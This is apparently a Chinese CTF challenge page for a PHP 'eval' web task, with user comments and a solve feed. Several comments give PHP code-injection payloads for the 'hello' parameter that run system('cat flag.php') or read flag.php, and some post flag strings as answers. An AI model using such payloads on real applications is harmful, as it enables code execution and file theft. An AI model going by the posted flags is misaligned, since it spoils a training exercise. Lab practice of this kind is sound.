evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 15181
提  示:
描  述:
eval
评论
Lsec 1年前

1:?hello=file('flag.php') 2:?hello=);highlight_file('flag.php');var_dump( 3:?hello=eval(system('cat flag.php | base64'))

回复 1

你呀你ii 1年前

?hello=eval(system('cat flag.php | base64'))

回复 4
baianquanzu 1年前

?hello=system('sort flag.php')

回复 0

xlxlxl 1年前

?hello=system('cat flag.php')

回复 1

凉情梦回 1年前

?hello=system('cat flag.php')

回复 3

liu666 1年前

flag{930e51a7a500775093c95aae8b67e404}

回复 3

userdong 1年前

?hello=system('cat flag.php')

回复 3

riacky 1年前

?hello=system('cat flag*')

回复 3

hhthht 1年前

flag{cea9de710e2926a7c49f12318caf3912}

回复 0

ryan777 1年前

根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')

回复 2

AmazingForself 1年前

看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539

回复 0

ryl123569 1年前

?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}

回复 0

xiaobaiermei 1年前

这里应该算的上是个文件包含吧

回复 0

17leaf 1年前

flag{4ccf17345bf8d8b3c5a6d005cf17e00a}

回复 0

cap 1年前

为啥我这样不行 ?hello=system("cat flag.php")

回复 0
Restwlaq 1年前

因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')

回复 0

你的宝 1年前

http://114.67.175.224:15626/?hello=file(%27flag.php%27)

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

CJ00q 攻破了该题 25分钟前
wyswyswys 攻破了该题 2小时前
fxstu 攻破了该题 3小时前
smileblack 攻破了该题 4小时前
GOOFY 攻破了该题 6小时前
shayijlong 攻破了该题 20小时前
果冻战士 攻破了该题 20小时前
yfm277 攻破了该题 22小时前
alwayslookpoomi 攻破了该题 22小时前
2278788320 攻破了该题 1天前
swind11 攻破了该题 1天前
GTfree 攻破了该题 1天前
用户1119 攻破了该题 1天前
byx341 攻破了该题 1天前
2023329600155 攻破了该题 1天前
熊熊出没 攻破了该题 1天前
online 攻破了该题 2天前
晴天1 攻破了该题 2天前
poezhu 攻破了该题 2天前
jiuxi1026 攻破了该题 3天前
问题反馈